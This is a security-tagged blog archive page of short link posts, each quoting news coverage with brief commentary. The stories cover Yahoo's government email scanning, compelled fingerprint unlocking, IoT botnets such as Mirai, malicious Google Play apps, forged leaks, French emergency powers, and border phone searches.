Tag: Security

Categories
Links

More Thoughts on the Yahoo Scan

Macy Wheeler:

To sum up: ex-Yahoo employees want this story to be about the technical recklessness of the request and Yahoo’s bureaucratic implementation of it. Government lawyers and spooks are happy to explain this was a traditional FISA order, but want to downplay the intrusiveness and recklessness of this by claiming it just involved adapting an existing scan. And intelligence committee members mistakenly believed this scan happened under Section 702, and wanted to make it a 702 renewal fight issue, but since appear to have learned differently.

This is the definitive summarization of what Yahoo! (likely) did when they monitored all of their customers’ emails for the US government. Well worth the read for its content and, also, to see what goes into a critical media evaluation of an unfolding intelligence-related series of news stories.

Categories
Links

Yahoo May Have Exposed Rogers Customer Emails to US Spies

Motherboard:

“Any program that scans all the mail that Yahoo has access to would have scanned this email,” Gillmor wrote me in a message.

“If Yahoo chose to segment their scanning by limiting it only to mails that have ‘@yahoo.com’ email addresses [and omitted those sent from @rogers.com], of course, then they would have chosen to exclude this email from the scan,” Gillmor continued. “It’s not clear to me whether any such constraint was in place, though.”

“I’d imagine that, yes, the program would have applied to Rogers customer emails, unless Yahoo elected to specifically exclude them,” wrote Marczak in an email.

Yahoo declined to comment on whether the alleged system filtered out emails from Rogers customers.

Tobi Cohen, a spokesperson for the Office of the Privacy Commissioner, confirmed that Rogers consulted the office in the wake of the Yahoo hack. But as far as the possibility that Rogers customer emails had been siphoned into a surveillance dragnet goes, “Given we don’t have detailed information about the matter, we are not in a position to comment,” Cohen wrote.

When asked if Rogers was aware of the allegations against Yahoo or if the company is concerned that a backdoor could have affected its customers, spokesperson Garas referred me to Yahoo’s statement and wrote that “as such, we believe this matter is closed.”

Great to know that Rogers thinks it shouldn’t (or, worse, doesn’t have to) explain how one of its contracted service providers may have grossly violated the privacy of Rogers’ customers.

Categories
Links Writing

Feds Walk Into A Building. Demand Everyone’s Fingerprints To Open Phones

Forbes:

Legal experts were shocked at the government’s request. “They want the ability to get a warrant on the assumption that they will learn more after they have a warrant,” said Marina Medvin of Medvin Law. “Essentially, they are seeking to have the ability to convince people to comply by providing their fingerprints to law enforcement under the color of law – because of the fact that they already have a warrant. They want to leverage this warrant to induce compliance by people they decide are suspects later on. This would be an unbelievably audacious abuse of power if it were permitted.”

Jennifer Lynch, senior staff attorney at the Electronic Frontier Foundation (EFF), added: “It’s not enough for a government to just say we have a warrant to search this house and therefore this person should unlock their phone. The government needs to say specifically what information they expect to find on the phone, how that relates to criminal activity and I would argue they need to set up a way to access only the information that is relevant to the investigation.

It’s insane that the US government is getting chained warrants that authorize expansive searches without clarifying what is being sought or the specific rationales for such searches. Such actions represent an absolute violation of due process.

But, at the same time, the government’s actions (again) indicate the relative weaknesses of the ‘going dark’ arguments. While iPhones and other devices are secured to prevent all actors from illegitimately accessing them, fingerprint-enabled devices can let government agencies bypass security protections with relative ease. This doesn’t mean that fingerprint scanners are bad – most people’s threat models aren’t police, but criminals, snoopy friends and family, etc – but instead that authorities can routinely bypass, rather than need to break, cryptographically-secured communications.

Categories
Links

How hard is it to hack the average DVR? Sadly, not hard at all

Ars Technica:

Johannes B. Ullrich, a researcher and chief technology officer for the SANS Internet Storm Center, wanted to know just how vulnerable these devices are to remote takeover, so he connected an older DVR to a cable modem Internet connection. What he saw next—a barrage of telnet connection attempts so dizzying it crashed his device—was depressing.

“The sad part is, that I didn’t have to wait long,” he wrote in a blog post published Monday. “The IP address is hit by telnet attempts pretty much every minute. Instead of having to wait for a long time to see an attack, my problem was that the DVR was often overwhelmed by the attacks, and the telnet server stopped responding. I had to reboot it every few minutes.”

The Internet of Things should, at this point, mostly be renamed the Internet of Threats.

Categories
Links Writing

Brace yourselves—source code powering potent IoT DDoSes just went public

Brace yourselves—source code powering potent IoT DDoSes just went public:

Both Mirai and Bashlight exploit the same IoT vulnerabilities, mostly or almost exclusively involving weakness involving the telnet remote connection protocol in devices running a form of embedded Linux known as BusyBox. But unlike Bashlight, the newer Mirai botnet software encrypts traffic passing between the infected devices and the command and control servers that feed them instructions. That makes it much harder for researchers to monitor the malicious network. There’s also evidence that Mirai is able to seize control of Bashlight-infected devices and possibly even patch them so they can never be infected again by a rival botnet. About 80,000 of the 963,000 Bashlight devices now belong to Mirai operators, Drew said.

Next time you see a vendor sell you something that can be connected to the Internet, be sure to ask:

  • How long will you be providing support for this product?
  • How will you be pushing security updates to this product?
  • What mitigation strategies have you implemented to ensure that a third-party doesn’t take control of this product?
  • What will you do to help me when this device is compromised because of a vulnerability in this product?

I can almost guarantee that whomever is selling the product will either look at you slackjawed or try to use buzzwords to indicate the product is secure. But they will almost certainly be unable to genuinely answer the questions because vendors are not securing their devices. It’s their failures which are have created the current generation of threats that the global Internet is just now starting to grapple with.

Categories
Links

Moto Z Play review: the best battery life of any smartphone today

But the Moto Z Play rarely feels like you’re doing much settling. Even when you add together the negatives like an average camera, Verizon’s annoying bloatware, and Lenovo’s poor track record with software updates, the Moto Z Play’s affordable price, zippy performance, and unbelievable battery life still add up to something very compelling. And yes, unlike the Z and Z Force, there’s even a headphone jack built in. Forget the Z’s before it; this is the practical Moto Z that most people should get. It’s available exclusively from Verizon Wireless for a limited time for $408, but starting in October you can get it unlocked on GSM carriers (and free of carrier bloat) for $450.

The Verge notes that if you buy a Moto Z you’re unlikely to get “software updates”. That doesn’t just mean you won’t get bells and whistles and neat new features as Google releases new versions of their operating system. It also means that Lenovo will not send you security updates. So you’ll have a long-lasting smartphone that is insecure to trivial attacks that could extract sensitive personal information or otherwise compromise your device.

But other than that, I’m sure it’s a great phone to recommend.

Categories
Links

More than 400 malicious apps infiltrate Google Play

Ars Technica:

One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

“This malware allows threat actors to infiltrate a user’s network environment,” Thursday’s report stated. “If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard.”

BYOD: a great cost-saving policy. Until it leads to an attacker compromising your network and potentially exfiltrating business-vital resources.

Categories
Links

Organizational Doxing and Disinformation – Schneier on Security

From Bruce Schneier:

Major newspapers do their best to verify the authenticity of leaked documents they receive from sources. They only publish the ones they know are authentic. The newspapers consult experts, and pay attention to forensics. They have tense conversations with governments, trying to get them to verify secret documents they’re not actually allowed to admit even exist. This is only possible because the news outlets have ongoing relationships with the governments, and they care that they get it right. There are lots of instances where neither of these two things are true, and lots of ways to leak documents without any independent verification at all.

No one is talking about this, but everyone needs to be alert to the possibility. Sooner or later, the hackers who steal an organization’s data are going to make changes in them before they release them. If these forgeries aren’t questioned, the situations of those being hacked could be made worse, or erroneous conclusions could be drawn from the documents. When someone says that a document they have been accused of writing is forged, their arguments at least should be heard.

As someone who routinely receives, and consults on, leaked documents I can emphatically say this is a serious issue. And that journalists are generally very cautious these days about publishing based on mysteriously sourced documents.

Categories
Aside Links

France’s Emergency Powers: The New Normal

Just Security:

The new, six-month extension of emergency powers creates France’s longest state of emergency since the Algerian War in the 1950s. The new law restores or extends previous emergency provisions, such as empowering police to carry out raids and local authorities to place suspects under house arrest without prior judicial approval. It also expands those powers, for example allowing the police to search luggage and vehicles without judicial warrants. In addition it reinstates warrantless seizures of computer and cellphone data that France’s highest legal authority had struck down as unconstitutional, adding a few restrictions that still fall short of judicial oversight.

In separate reports in February, Human Rights Watch and Amnesty International documented more than three dozen cases in which the use of these emergency powers violated universal rights to liberty, privacy, or freedoms of movement, association and expression. The two groups also found that the emergency acts lost suspects jobs, traumatized children, and damaged homes. The vast majority of those targeted were Muslims. Those interviewed said the actions left them feeling stigmatized and eroded their trust in the French authorities. The latest version of the emergency law risks compounding these effects.

The decisions to advance unconstitutional and discriminatory ‘security’ laws and policies following serious crimes threaten to undermine democracies while potentially strengthening states. But worryingly there are fewer and fewer loud voices for the rough and tumble consequences of maintaining a democratic form of governance as opposed to those who assert that a powerful state apparatus is needed if normalcy is to exist. The result may be the sleepwalking from governments for and by the people, to those that protect citizen-serfs and harshly discriminate against difference.

Categories
Links

WSJ Reporter: Homeland Security Tried to Take My Phones at the Border

Motherboard:

“Travel “naked” as one encryption expert told me. If any government wants your information, they will get it no matter what,” she adds.

Something has gone terribly awry if this is the advice that journalists working for international news outlets are giving to those entering or exiting the United States.